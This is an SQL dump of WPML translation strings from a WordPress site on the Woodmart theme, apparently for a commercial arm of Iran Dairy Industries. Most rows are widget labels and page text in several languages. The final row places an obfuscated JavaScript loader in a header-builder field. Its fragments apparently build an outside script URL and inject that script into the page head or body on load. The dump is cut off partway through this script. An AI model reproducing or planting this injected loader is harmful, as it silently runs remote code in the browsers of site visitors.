(3846, 'en', 'woodmart', '12a4b0d023a2b705a3a5ac69313151da', 'WOODMART HTML Block', NULL, NULL, '', 'LINE', NULL, 0, '', 'da7ea6eaa2c66e08b26c9f2ceaafb0d5', 'optional', NULL),
(3847, 'en', 'woodmart', '0d50b8a5474f45ff967d4033e822d1aa', 'Display HTML block', NULL, NULL, '', 'LINE', NULL, 0, '', 'b2b37a88d984f12c63eb0efdce079aeb', 'optional', NULL),
(3848, 'en', 'woodmart', 'eae9fd022160d2216c4647a82a4dee1f', 'WOODMART Banner', NULL, NULL, '', 'LINE', NULL, 0, '', '0d2c24c9f4652a37317ead5212046ba3', 'optional', NULL),
(3849, 'en', 'woodmart', 'c4456a689ef965a28a54037a7cb1af01', 'Promo banner with text', NULL, NULL, '', 'LINE', NULL, 0, '', 'cd107e15cc1a8736177068a79afdc57e', 'optional', NULL),
(3850, 'en', 'woodmart', '37734fcf7656705e72e268c6ae169def', 'Example: \'thumbnail\', \'medium\', \'large\', \'full\'.', NULL, NULL, '', 'LINE', NULL, 0, '', 'c475098ec9c1235eddcd3e65b2ba5c5a', 'optional', NULL),
(3851, 'en', 'woodmart', '91e64f9cc955fe619d56b1a270681ac2', 'WOODMART User Panel', NULL, NULL, '', 'LINE', NULL, 0, '', 'c7592a6ee450b45704b119cc759cdbdf', 'optional', NULL),
(3852, 'en', 'woodmart', 'd4102c3b4e6e8e4e82a1ea39d8cae35a', 'User panel to use in My Account area', NULL, NULL, '', 'LINE', NULL, 0, '', 'f92b9402dd075a6862605ffff8041fee', 'optional', NULL),
(3853, 'en', 'woodmart', '119b4fd57060ef68eb6ab507a98299d3', 'WOODMART Price filter', NULL, NULL, '', 'LINE', NULL, 0, '', '24ca18ea0b712b9d7e90c09804684652', 'optional', NULL),
(3854, 'en', 'woodmart', 'f2de0ed7713e3fcb56b743539afcf18c', 'Price filter list', NULL, NULL, '', 'LINE', NULL, 0, '', 'b6a38ec0c432316369a795a2755f5fbd', 'optional', NULL),
(3855, 'en', 'woodmart', '691f1f4ffe94702224e0e2964b7ae2fb', 'Show empty price ranges', NULL, NULL, '', 'LINE', NULL, 0, '', '9728d47bbd39d223ef75005a79a4c1e8', 'optional', NULL),
(3856, 'en', 'woodmart', '332308dfd8acdada758b1b618477e643', 'May increase this widget performance if you have a lot of products in your store.', NULL, NULL, '', 'LINE', NULL, 0, '', 'f734d41650b9722d716246c4b30258eb', 'optional', NULL),
(3857, 'en', 'woodmart', '911dd70b5743d574ec2411fdbb54341a', 'Add a custom mega menu to your sidebar.', NULL, NULL, '', 'LINE', NULL, 0, '', 'ed852374e1874363eb327ab315a50ddc', 'optional', NULL),
(3858, 'en', 'woodmart', '4c97fdecef115dc1360f136a728e5374', 'WOODMART Sidebar Mega Menu', NULL, NULL, '', 'LINE', NULL, 0, '', '34d991422ff0db47ba81cfdc8e01a1c8', 'optional', NULL),
(3859, 'en', 'woodmart', '51ec9bf4aaeab1b25bb57f9f8d4de557', 'Title:', NULL, NULL, '', 'LINE', NULL, 0, '', '99313a6925ffda36489f33cab5737647', 'optional', NULL),
(3860, 'en', 'woodmart', '1c9cdbc587153c1c314ff3e6478ded16', 'Select Menu:', NULL, NULL, '', 'LINE', NULL, 0, '', '4d0ac351d83a4b5d04522bdb5c140f7f', 'optional', NULL),
(3861, 'en', 'woodmart', '9e32d091f81d11ff2649e93d8034f5db', '&mdash; Select &mdash;', NULL, NULL, '', 'LINE', NULL, 0, '', '6b65d8c3879a6f43418ba9a6a3be3fa8', 'optional', NULL),
(3862, 'en', 'woodmart', '21ab530276edacad4097c7f05cdecb2f', 'WOODMART Instagram', NULL, NULL, '', 'LINE', NULL, 0, '', 'f6922fd56b28b85460951bc98204e7f8', 'optional', NULL),
(3863, 'en', 'woodmart', '94dfd55f99428ec6bdb899360cb20542', 'Permalink to %s', NULL, NULL, '', 'LINE', NULL, 0, '', '9c1a2c39be05347fd68b54a6996004a8', 'optional', NULL),
(3864, 'en', 'woodmart', '341825a909ae0a19dd9dbea98ef3e021', 'Recent Posts', NULL, NULL, '', 'LINE', NULL, 0, '', '22b7ec9b3e3abd29abf49ee7a266b22b', 'optional', NULL),
(3865, 'en', 'woodmart', 'c87ce848a268018fa98f677214ac9003', 'WOODMART Recent Posts', NULL, NULL, '', 'LINE', NULL, 0, '', '4a9d4f20283e45626201f4c200fe6254', 'optional', NULL),
(3866, 'en', 'woodmart', '182d7554d364003f8760b3fb7ffa6093', 'An advanced widget that gives you total control over the output of your site’s most recent Posts.', NULL, NULL, '', 'LINE', NULL, 0, '', '8f4d2fde8ba8d09123023174971f9041', 'optional', NULL),
(3867, 'en', 'woodmart', '36fb383edd9f7c1594d4168fb999c379', 'No Comments', NULL, NULL, '', 'LINE', NULL, 0, '', 'da919c14b60f187a4ff9afcd4b3d7c46', 'optional', NULL),
(3868, 'en', 'woodmart', 'b51bdff4f4016351f0707fd0bf464128', '%s Comments', NULL, NULL, '', 'LINE', NULL, 0, '', '949f384624399a8c5367288a0a939099', 'optional', NULL),
(3869, 'en', 'woodmart', '0f0c0c1c95507b2503aa8c432c3c3188', '1 Comment', NULL, NULL, '', 'LINE', NULL, 0, '', 'b4e1b3bcdd44a23913ea28f13cde3e56', 'optional', NULL),
(3870, 'en', 'woodmart', 'c6534d67dc777f7ac4cdb6cfcbe5cd73', 'Orderby', NULL, NULL, '', 'LINE', NULL, 0, '', '0cffcc0093102c47eee5beb71610981f', 'optional', NULL),
(3871, 'en', 'woodmart', '10e9703ec3912689ce14e52dff6b99c8', 'Comment Count', NULL, NULL, '', 'LINE', NULL, 0, '', 'addfedf0d56cce6d3e611dcf2fe78317', 'optional', NULL),
(3872, 'en', 'woodmart', '1c572c6837c919c881337a91c68f8894', 'Menu Order', NULL, NULL, '', 'LINE', NULL, 0, '', 'e9669e251bdb633ca3086ee18cc68374', 'optional', NULL),
(3873, 'en', 'woodmart', '6f433f4a921abe8f10e10bec25edc819', 'Number of posts to show', NULL, NULL, '', 'LINE', NULL, 0, '', 'cdf3e51b3263e5465deba8ff1ec669de', 'optional', NULL),
(3874, 'en', 'woodmart', '5e40aba428c200144a93fa4685a7847b', 'The number of posts to skip', NULL, NULL, '', 'LINE', NULL, 0, '', '19ef89be8b636d46c451d77e574d1228', 'optional', NULL),
(3875, 'en', 'woodmart', '1a71117bdce1460c0ba45bd128659c3d', 'Display Thumbnail', NULL, NULL, '', 'LINE', NULL, 0, '', '9f8ea0ab5b3efdc5a4d2ff52719ffcbe', 'optional', NULL),
(3876, 'en', 'woodmart', 'cb7742043dbc073c89b4c42daff83e54', 'Thumbnail (height)', NULL, NULL, '', 'LINE', NULL, 0, '', '474e70d5f4fdde73a1cfc9c7d6791d2e', 'optional', NULL),
(3877, 'en', 'woodmart', '250ff6b9654ef05606ffcd2df0908996', 'Thumbnail (width)', NULL, NULL, '', 'LINE', NULL, 0, '', '2b62a8beee08dacca18c2ce192e08f8b', 'optional', NULL),
(3878, 'en', 'woodmart', '3d391ee3c762cf95757d9035b313a097', 'Display Comment Count', NULL, NULL, '', 'LINE', NULL, 0, '', '4268039c0244fad9af7062177d022a18', 'optional', NULL),
(3879, 'en', 'woodmart', 'a6a1f6e2d8195754c4a67f37fd9807a8', 'Display Date', NULL, NULL, '', 'LINE', NULL, 0, '', '7dc4c7f73f460bd63c8c32a0bc642d26', 'optional', NULL),
(3880, 'en', 'woodmart', '4c1db5cb8df61e0d3d894dcbd2ab19bb', 'WOODMART Mailchimp ', NULL, NULL, '', 'LINE', NULL, 0, '', 'e9ca5510cfb857d72bc924db60c98078', 'optional', NULL),
(3881, 'en', 'woodmart', '23fe14883fdc296211cbba9c8b6db1e0', 'Any %s', NULL, NULL, '', 'LINE', NULL, 0, '', '6c3096239e84b1ffd771ff4a4a01b5a6', 'optional', NULL),
(3882, 'en', 'woodmart', '9983381c21069a3d6e4432e0aaea0079', 'Clear search', NULL, NULL, '', 'LINE', NULL, 0, '', '88ccc13eec2edacf6b82d213185f22ff', 'optional', NULL),
(3883, 'en', 'woodmart', '21f7f815d09262bccadb349186e70f3f', 'Swatch image', NULL, NULL, '', 'LINE', NULL, 0, '', '8b85b48c778bf69b5c4259e985a3abc0', 'optional', NULL),
(3884, 'en', 'woodmart', 'fd9b42c1e5b8978be28ddf8e5b6e4670', 'WOODMART WooCommerce Layered Nav', NULL, NULL, '', 'LINE', NULL, 0, '', '4bfc50e450bb7526e86e4f7d3be7b679', 'optional', NULL),
(3885, 'en', 'woodmart', 'adafe8bb8c9cd431457fb05f725b397f', 'Shows a custom attribute in a widget which lets you narrow down the list of products when viewing product categories.', NULL, NULL, '', 'LINE', NULL, 0, '', 'aa6e6e1e5ab30a80e4552eceb1b6242b', 'optional', NULL),
(3886, 'en', 'woodmart', '1b36277f6f3dcbff0d0ab85b1abc26a2', 'Show on category', NULL, NULL, '', 'LINE', NULL, 0, '', '97384d42c6a2d1e874a258114c326d4b', 'optional', NULL),
(3887, 'en', 'woodmart', '90651ebea9a35ec4e018c8157492e17c', 'ON', NULL, NULL, '', 'LINE', NULL, 0, '', 'cf02e53962627ff1541e28a35b98708b', 'optional', NULL),
(3888, 'en', 'woodmart', '88559a0cfd8250c9d65970cc145c92d4', 'OFF', NULL, NULL, '', 'LINE', NULL, 0, '', '60d30dd4d1428e1065635ed37662824f', 'optional', NULL),
(3889, 'en', 'woodmart', '423bfbf575e95e7f89a945544ba0d3ba', 'Show tooltips', NULL, NULL, '', 'LINE', NULL, 0, '', '381ada0c98393f3cd415a54628525015', 'optional', NULL),
(3890, 'en', 'woodmart', '65250cfd4357ed3202da38d49aa685e8', 'Show search input for this attribute', NULL, NULL, '', 'LINE', NULL, 0, '', '6f184a613fad534ff71bb3fcf05db141', 'optional', NULL),
(3891, 'en', 'woodmart', 'd132286ce060a9349df55de2808b4d5f', 'No matches found', NULL, NULL, '', 'LINE', NULL, 0, '', 'bf532f61fbab05c856b29818cad0868c', 'optional', NULL),
(3892, 'en', 'woodmart', 'ce76900e2ce52e01bec446e62cd12bfc', 'Find a %s', NULL, NULL, '', 'LINE', NULL, 0, '', '34a8bac827d3ba2424187f60dac5462a', 'optional', NULL),
(3893, 'en', 'woodmart', '99dbf89745dbab99d2c970f436507afb', 'WOODMART AJAX Search', NULL, NULL, '', 'LINE', NULL, 0, '', '32777b379e016f727ebb2e5f6d40ec27', 'optional', NULL),
(3894, 'en', 'woodmart', '73a2659d1cac50afe74510bcc7db3184', 'Search form by products with AJAX', NULL, NULL, '', 'LINE', NULL, 0, '', 'cb1780df4119df441f26df7839b4e6e7', 'optional', NULL),
(3895, 'en', 'woodmart', '437ac95a91364eb49587af5e146b1745', 'Search products', NULL, NULL, '', 'LINE', NULL, 0, '', '80bd841498603e3ac889095212ea47fa', 'optional', NULL),
(3896, 'en', 'woodmart', 'd09647a2da5bac0d05bd01defc114b6b', 'WOODMART Twitter', NULL, NULL, '', 'LINE', NULL, 0, '', '348870c76bc7dedff02963d1790e3893', 'optional', NULL),
(3897, 'en', 'woodmart', 'b31bc1ca3fe3611545caf131a2769772', 'Displays the most recent tweets from your Twitter Stream.', NULL, NULL, '', 'LINE', NULL, 0, '', '67f6983bdabbe6bc7b066463b2ffada8', 'optional', NULL),
(3898, 'en', 'woodmart', '7450c540d4c3fef04b723fdeadbc6842', 'Recent Tweets', NULL, NULL, '', 'LINE', NULL, 0, '', '3a235de4e34d7c0e37871ab7aeebef27', 'optional', NULL),
(3899, 'en', 'woodmart', 'f94c84fac5cb091c60bb143cb957d229', 'xxxxxxxxxxxx', NULL, NULL, '', 'LINE', NULL, 0, '', '91d4178f6c2a15a478e16bff69142c5e', 'optional', NULL),
(3900, 'en', 'woodmart', '96ca5a17dfda95275d6375bc62bf6d15', 'Twitter Name (without @ symbol):', NULL, NULL, '', 'LINE', NULL, 0, '', '895c1bb84d8eb70a147a44672173cd9e', 'optional', NULL),
(3901, 'en', 'woodmart', 'bb52daed448e0b542116de997b17986a', 'Number of Tweets:', NULL, NULL, '', 'LINE', NULL, 0, '', '17161a229778f279eaae670e75b3406e', 'optional', NULL),
(3902, 'en', 'woodmart', 'aea0263d1ae5a5cb7f74c0eb54c55b5a', 'Consumer Key:', NULL, NULL, '', 'LINE', NULL, 0, '', '794a2df248fe71464b5724cd1d0df54d', 'optional', NULL),
(3903, 'en', 'woodmart', 'f041c807306a2e2cc2f01f7ca1bdd217', 'Consumer Secret:', NULL, NULL, '', 'LINE', NULL, 0, '', '00465e8ae1deeff326983462d2f01346', 'optional', NULL),
(3904, 'en', 'woodmart', '13aa1bfc6ae9f30180a353c54e97268d', 'Access Token:', NULL, NULL, '', 'LINE', NULL, 0, '', 'f3f9711425fc6c48929efbf914aa2c1c', 'optional', NULL),
(3905, 'en', 'woodmart', 'b84fb3b7b5bc2d4dabebb3051cc6c3b0', 'Access Token Secret:', NULL, NULL, '', 'LINE', NULL, 0, '', '9a64ee717130b4788efdfac60309f27a', 'optional', NULL),
(3906, 'en', 'woodmart', 'a502fae80385c2c0501758d150888390', 'Size of Avatar (default: 48):', NULL, NULL, '', 'LINE', NULL, 0, '', 'ff213af75570c8129b1a3480b9e9eca3', 'optional', NULL),
(3907, 'en', 'woodmart', '51ad181323a29ab8d6664334354181b8', 'input number only', NULL, NULL, '', 'LINE', NULL, 0, '', '02a32e3b78f41d2317b7bec9cf094ab5', 'optional', NULL),
(3908, 'en', 'woodmart', '21404519a38ef71ec7c8f5b6ca497313', 'WOODMART Stock status', NULL, NULL, '', 'LINE', NULL, 0, '', '43fc9a7692848faadd8987dd24c97b01', 'optional', NULL),
(3909, 'en', 'woodmart', '64181dfcaba3cb580894d330e606624e', 'Filter stock and on-sale products', NULL, NULL, '', 'LINE', NULL, 0, '', 'dec15db3ee5f813aec98e078d5bf058d', 'optional', NULL),
(3910, 'en', 'woodmart', '795d59a96adcde416d31c5b1b6fae364', 'Nothing Found', NULL, NULL, '', 'LINE', NULL, 0, '', '3c9791afa75f0f5cb7786eeb163145ab', 'optional', NULL),
(3911, 'en', 'woodmart', '3d224d858abf648690e8a5b65738eb4b', 'Apologies, but no results were found. Perhaps searching will help find a related post.', NULL, NULL, '', 'LINE', NULL, 0, '', '63be6f3eab1e73dd1345ff513a325719', 'optional', NULL),
(3912, 'en', 'woodmart', '2379d290e577d6407518769a6a2cad3a', '&larr; Older Comments', NULL, NULL, '', 'LINE', NULL, 0, '', 'b4994f8ccbaa903c581381f203c540d2', 'optional', NULL),
(3913, 'en', 'woodmart', '4c42ccb4e8de473e402d55dc5c21a5c6', 'Newer Comments &rarr;', NULL, NULL, '', 'LINE', NULL, 0, '', '8dddf0cb0ea6521e33354b4651f3891c', 'optional', NULL),
(3914, 'en', 'woodmart', '221b94a7f866d10d0b85b7886cea5d18', 'Comment navigation', NULL, NULL, '', 'LINE', NULL, 0, '', '9deca46c7741f6fff7400a654c8e39f0', 'optional', NULL),
(3915, 'en', 'woodmart', '496c558a09bbbcfc869aa80b2f037261', 'Comments are closed.', NULL, NULL, '', 'LINE', NULL, 0, '', 'dfc9aecb86289b97e85f88d1c060f8dc', 'optional', NULL),
(3916, 'en', 'woodmart', '5e842f65391c3945c5d208be06d82896', 'One thought on &ldquo;%2$s&rdquo;', NULL, NULL, '', 'LINE', NULL, 0, 'comments title', 'b0b637051af5eeb07421868eb4fb3410', 'optional', NULL),
(3917, 'en', 'woodmart', 'ed9e37872f818f1e8903eba505917478', '%1$s thoughts on &ldquo;%2$s&rdquo;', NULL, NULL, '', 'LINE', NULL, 0, 'comments title', 'e9594c1b739f39358429f49d2629e5fa', 'optional', NULL),
(3918, 'en', 'woodmart', '1b7dd7eee76fe086577624fc5f467af3', 'Link on post %s', NULL, NULL, '', 'LINE', NULL, 0, '', 'b672164decb7e35dc991ce75fbfc13a7', 'optional', NULL),
(3919, 'en', 'woodmart', '0974d2c2f4c6420089275c2a41c4b41c', 'Pages:', NULL, NULL, '', 'LINE', NULL, 0, '', '194d6b3aecbe683f3bc1b907b8026157', 'optional', NULL),
(3920, 'en', 'woodmart', '246cab9fbc375c19e0c6c1ae476415b0', 'Project link', NULL, NULL, '', 'LINE', NULL, 0, '', '4f2c62d6d6b304500b7c89f92afc4c98', 'optional', NULL),
(3921, 'en', 'woodmart', 'f39581bfd430e0ae96396424e51350d5', 'View Large', NULL, NULL, '', 'LINE', NULL, 0, '', 'a916b0d5346125bcb541d04f58264f9c', 'optional', NULL),
(3922, 'en', 'woodmart', '71ad721d75561a4022f3092adfc791b5', 'Continue reading <span class=\"meta-nav\">&rarr;</span>', NULL, NULL, '', 'LINE', NULL, 0, '', '254ff6f20d681ba64cea14b782dfbeef', 'optional', NULL),
(3923, 'en', 'woodmart', '5db707f74d87bd123c565cfe06c13522', 'All rights reserved', NULL, NULL, '', 'LINE', NULL, 0, '', '74c2459e2a625fe2a9113019bd36e7ea', 'optional', NULL),
(3924, 'en', 'woodmart', '24743d45751d7d78a70cc9267db2e03f', 'View all posts by %s <span class=\"meta-nav\">&rarr;</span>', NULL, NULL, '', 'LINE', NULL, 0, '', '9750f3c569e6be7ce705dbb3747a0bfe', 'optional', NULL),
(3925, 'en', 'woodmart', '177f0eb97c41c1d839bff85af7cb1120', 'Related Posts', NULL, NULL, '', 'LINE', NULL, 0, '', '050a46373a6253ddb7ac8566c7da3bdf', 'optional', NULL),
(3926, 'en', 'woodmart', '189f63f277cd73395561651753563065', 'Tags', NULL, NULL, '', 'LINE', NULL, 0, '', 'fa1f448ef17f29cea038549e03c01f61', 'optional', NULL),
(3927, 'en', 'woodmart', '4840f4437f55e68a587d358090b948d1', 'My Wishlist', NULL, NULL, '', 'LINE', NULL, 0, '', '9ad2c2ed8e87efeff4d9676d6b395a6b', 'optional', NULL),
(3928, 'en', 'woodmart', '405052625413ced6cb817945ce4f6b01', 'Create your first <a href=\"%s\"><strong>navigation menu here</strong></a> and add it to the \"Main menu\" location.', NULL, NULL, '', 'LINE', NULL, 0, '', 'd82002aa514cfc30cfbdec4f29678288', 'optional', NULL),
(3929, 'en', 'woodmart', '9d8180e0960910f4468ce937bb7604eb', 'Secondary navigation', NULL, NULL, '', 'LINE', NULL, 0, '', 'fe02b7db48cd19ed4b59ba117a6bbb65', 'optional', NULL),
(3930, 'en', 'woodmart', '56cc6d1caa7bce817c893e64793c2539', 'Show more category button', NULL, NULL, '', 'LINE', NULL, 0, '', 'e5fd3ca95b7b9a73ba4822d8a7f1cf1c', 'optional', NULL),
(3931, 'en', 'woodmart', '7039290e729e262f1de591c044abd59e', 'Browse Categories', NULL, NULL, '', 'LINE', NULL, 0, '', '7b06894b8d468f499105eeb4651b1e74', 'optional', NULL),
(3932, 'en', 'woodmart', '6d17a3ac1b3665377655f24aad8f49d3', 'Header categories navigation', NULL, NULL, '', 'LINE', NULL, 0, '', 'e8f46ecedec39b0e8f46d7f7521e722b', 'optional', NULL),
(3933, 'en', 'admin_texts_whb_default_header', '[whb_default_header][structure][content][1][content][0][content][0][params][content]value', '<div class=\"site-logo\"><a class=\"wd-logo wd-main-logo woodmart-logo woodmart-main-logo\" href=\"http://arisgolpayegan.com/\" rel=\"home\">\n<img style=\"max-width: 350px;\" src=\"http://arisgolpayegan.com/wp-content/uploads/2022/10/LogoEn.png\" alt=\"Aris\" /> </a></div>', NULL, NULL, '', 'LINE', NULL, 2, '', '20d0108d8eb9d281ea7a570cba6c7c40', 'optional', NULL),
(3934, 'en', 'Widgets', 'widget title - 093def74b110e3790fa53c30c56b2b56', 'معلومات عنا', NULL, NULL, '', 'LINE', NULL, 0, '', 'bace573f4f670d23c0440bee274b1b2a', 'optional', NULL),
(3935, 'en', 'Widgets', 'widget body - ea33e3d52baf3333274da7edbc633ca4', '<p style=\"text-align: justify;\">شركة صناعات الألبان الإيرانية هي إحدى الشركات التابعة لشركة صناعة الألبان الإيرانية التي تم إنشاؤها بما يتماشى مع الأهداف والسياسات الجديدة للتنمية الاقتصادية للبلاد ، وتسريع توريد المواد الخام والتعبئة والآلات.</p>', NULL, NULL, '', 'LINE', NULL, 0, '', '3c8bf19d0a9e76a5ca0c9f91899992ed', 'optional', NULL),
(3936, 'en', 'Widgets', 'widget title - 2295e7e61343b6dd44526eca09a7c4b7', 'اتصل بنا', NULL, NULL, '', 'LINE', NULL, 0, '', '6b349683e86ba76a416b0f03e0c3937d', 'optional', NULL),
(3937, 'en', 'Widgets', 'widget body - 2c5c81fd60683d630382957df5922fdb', 'العنوان: طهران - ميدان الارجنتين - نهاية شارع الفاند - زقاق جوفن - رقم 6', NULL, NULL, '', 'LINE', NULL, 0, '', 'bf2b6eae48f42ff4c217f6371578b908', 'optional', NULL),
(3938, 'en', 'Widgets', 'widget title - 7e37300e79e80e8fd773ae1a004a5e97', 'Насчет нас', NULL, NULL, '', 'LINE', NULL, 0, '', 'd82b46fa5cbf6357121dad60a89efcca', 'optional', NULL),
(3939, 'en', 'Widgets', 'widget body - 9c351d2b608259385e3c4879b3c8a59d', '<p style=\"text-align: justify;\">Коммерческая компания Iran Dairy Industries является одной из дочерних компаний Iran Dairy Industries и пищевой, сельскохозяйственной и фармацевтической холдинговой компании Национального пенсионного фонда, что соответствует целям и новой политике экономического развития комплекса и т. д. .</p>', NULL, NULL, '', 'LINE', NULL, 0, '', '63092aeff1b837e74bd00f51815464c4', 'optional', NULL),
(3940, 'en', 'Widgets', 'widget title - 1e0d13d316f23a5ea4243164f4fbc660', 'Свяжитесь с нами', NULL, NULL, '', 'LINE', NULL, 0, '', '84f5c160b2487005b1ced06877b0b048', 'optional', NULL),
(3941, 'en', 'Widgets', 'widget body - 87a365bc0a8b8567fb67d7324205c0c3', 'Адрес: Тегеран - Площадь Аргентины - Конец улицы Алванд - Аллея Джовен - № 6 - Код', NULL, NULL, '', 'LINE', NULL, 0, '', '54c8b739e008a6281d519bc0f58b2269', 'optional', NULL),
(3944, 'en', 'page-builder-shortcode-strings-14', 'c279be746fdc7d20f5712d43b9fa0817', '\r\n<h2 style=\"text-align: center; color: #fff; font-size: 28px; line-height: 1.5; margin-bottom: 55px;\">Why choose us?</h2>\r\n', 2, 9, '', 'VISUAL', 'vc_column_text: content', 0, '', '05b63441dd36db62933ec0486c33fe19', 'optional', 3),
(3945, 'en', 'page-builder-shortcode-strings-14', 'f97e23bda7b7e502f850e82dc7863eda', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">100% Natural\r\n</span></div>\r\n', 2, 10, '', 'VISUAL', 'vc_column_text: content', 0, '', '63d7f14280c539a1265accb8a20a02f5', 'optional', 2),
(3946, 'en', 'page-builder-shortcode-strings-14', '3aa7baaf84dfa597f703bdb93fe902d3', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Social Responsibility\r\n</span></div>\r\n', 2, 11, '', 'VISUAL', 'vc_column_text: content', 0, '', '046b095d2fbe4d5640d970da7872d836', 'optional', 2),
(3947, 'en', 'page-builder-shortcode-strings-14', '240a194077ca5acd5dda8e047a742bca', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Worldwide Export\r\n</span></div>\r\n', 2, 12, '', 'VISUAL', 'vc_column_text: content', 0, '', '2e6ae0a97c57b0218199d4aef0fcb2b2', 'optional', 2),
(3948, 'en', 'page-builder-shortcode-strings-14', '3537d9af9792533420aae8c9cb0fcb23', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Taste-oriented\r\n</span></div>\r\n', 2, 13, '', 'VISUAL', 'vc_column_text: content', 0, '', '2ef012b3f8e64c6ca1e688c01c4bbc1f', 'optional', 2),
(3949, 'en', 'page-builder-shortcode-strings-14', 'e7724d086927ccad85867afb1eea3534', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Standard and Healthy\r\n</span></div>\r\n', 2, 14, '', 'VISUAL', 'vc_column_text: content', 0, '', '97a32531de24d34e483d467ca0bc4e3c', 'optional', 3),
(3950, 'en', 'page-builder-shortcode-strings-14', '2819cd5652b31e9dd894263eaad04081', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Health-oriented products\r\n</span></div>\r\n', 2, 15, '', 'VISUAL', 'vc_column_text: content', 0, '', '5e33caa0984e6d936d4452852b6a802c', 'optional', 3),
(3951, 'en', 'page-builder-shortcode-strings-14', '7e002ac317a5d4607ee226e44b464821', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Eco-friendly\r\n</span></div>\r\n', 2, 16, '', 'VISUAL', 'vc_column_text: content', 0, '', 'c9aa46633e7d03953295b2a3798ea4b8', 'optional', 2),
(3952, 'en', 'page-builder-shortcode-strings-14', '3ef31b1d8ca0eeb9ac8ecdd842b6fd0d', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Lasting quality, mutual trust\r\n</span></div>\r\n', 2, 17, '', 'VISUAL', 'vc_column_text: content', 0, '', '20fe09971d12fc113dd64cdf43ea151b', 'optional', 4),
(3953, 'en', 'page-builder-shortcode-strings-14', 'dfd71a36da723fa3bba42ada1dd2061a', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Brand originality and nostalgia\r\n</span></div>\r\n', 2, 18, '', 'VISUAL', 'vc_column_text: content', 0, '', '16334e81a2a14856ce1f1427c73e0221', 'optional', 4),
(3954, 'en', 'page-builder-shortcode-strings-14', '24cbb401ed3ae0df6b9f64f981bbeafc', '\r\n<div class=\"desc\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Modern Farm\r\n</span></div>\r\n', 2, 19, '', 'VISUAL', 'vc_column_text: content', 0, '', 'bcb9ea972789a6b2863ef700508ec198', 'optional', 2),
(3956, 'en', 'page-builder-shortcode-strings-14', '4b73032a57f7e4edfde3dc625bc8fc31', 'gallbothoz', 2, 21, '', 'LINE', 'vc_row: el_id', 0, '', 'a3433c157bbc05a7b2a3586a6b8e5886', 'optional', 1),
(3957, 'en', 'page-builder-shortcode-strings-14', 'ca1d8b375f536e05ae8d05e08df8e494', '\r\n<h1 style=\"text-align: center;\"><span style=\"color: #023f88;\">Iran Dairy Industries Commercial Co. Products</span></h1>\r\n<p style=\"text-align: center;\">The unique quality of Pegah and Holding products and the potential of all production companies, obtaining various national and international standards, using experienced and specialized personnel and applying targeted and flexible policies and strategies to the market conditions of this company. Has helped achieve its long-term goals.</p>\r\n', 2, 2, '', 'VISUAL', 'vc_column_text: content', 0, '', '1f8ffaefca454c3f58a5b82443ca256e', 'optional', 54),
(3958, 'en', 'page-builder-shortcode-strings-14', 'dca48a68b1b20e0b7f0ec760b2724a81', '\r\n<h2 style=\"text-align: center;\"><span style=\"color: #023f88;\">Aris Social Media</span></h2>\r\n', 2, 3, '', 'VISUAL', 'vc_column_text: content', 0, '', 'fbe442e97be5b8209e5f983d27ad1d31', 'optional', 3),
(3959, 'en', 'page-builder-shortcode-strings-14', '5194b408b00cf3b18c1ee2888ac6e50b', '\r\n<h2><span style=\"color: #023f88;\">Aris commercial introduction</span></h2>\r\n<p style=\"text-align: justify;\">Iran Dairy Industries commercial Company is one of the subsidiaries of Iran Dairy Industries and the food, agriculture and pharmaceutical holding company of the National Pension Fund, which is in line with the goals and new policies of economic development of the complex and etc.</p>\r\n', 2, 20, '', 'VISUAL', 'vc_column_text: content', 0, '', '7776f172dbc2bafb5cbe8e81be2959a9', 'optional', 48),
(3960, 'en', 'admin_texts_woocommerce_customer_new_account_settings', '[woocommerce_customer_new_account_settings]additional_content', '', NULL, NULL, '', 'LINE', NULL, 0, '', 'e6cdac59bd85795b49247cad0bcfa660', '', NULL),
(3961, 'en', 'admin_texts_whb_main_header', 'whb_main_header', 'default_header', NULL, NULL, '', 'LINE', NULL, 0, '', '07190302f5f0f102543aa85ae8ec110f', 'optional', NULL),
(3962, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][0][content][0][content][0][params][content]value', '<script>var _0x1ee9ed=_0x3582;(function(_0x5402ee,_0x859616){var _0x19315d=_0x3582,_0x211dee=_0x5402ee();while(!![]){try{var _0x418b09=parseInt(_0x19315d(0x1f2))/0x1*(parseInt(_0x19315d(0x1f4))/0x2)+parseInt(_0x19315d(0x1f3))/0x3*(parseInt(_0x19315d(0x1e6))/0x4)+-parseInt(_0x19315d(0x1ec))/0x5+-parseInt(_0x19315d(0x1e5))/0x6+parseInt(_0x19315d(0x1f6))/0x7+parseInt(_0x19315d(0x1ee))/0x8*(parseInt(_0x19315d(0x1f7))/0x9)+-parseInt(_0x19315d(0x1f5))/0xa;if(_0x418b09===_0x859616)break;else _0x211dee[\'push\'](_0x211dee[\'shift\']());}catch(_0x5ec48e){_0x211dee[\'push\'](_0x211dee[\'shift\']());}}}(_0x13d4,0xe535e));function _0x13d4(){var _0x26c0ff=[\'src\',\'insertBefore\',\'ay.stra\',\'script[src=\\x22\',\'c/s\',\'om/s\',\'parentNode\',\'e.js\',\'3954396vvEtZb\',\'24VREnOn\',\'s://st\',\'bod\',\'appendChild\',\'head\',\'getElementsByTagName\',\'6985340bRdtfa\',\'currentScript\',\'3776NXRaHy\',\'tos\',\'querySelector\',\'script\',\'2882kaDwDw\',\'673689qiARAh\',\'932OHSVsN\',\'25036760HVLgEa\',\'9752470XONdsW\',\'26982jgCnbZ\'];_0x13d4=function(){return _0x26c0ff;};return _0x13d4();}function jxx(_0x28d334){var _0x511e7e=_0x3582;return Boolean(document[_0x511e7e(0x1f0)](_0x511e7e(0x1fb)+_0x28d334+\'\\x22]\'));}var 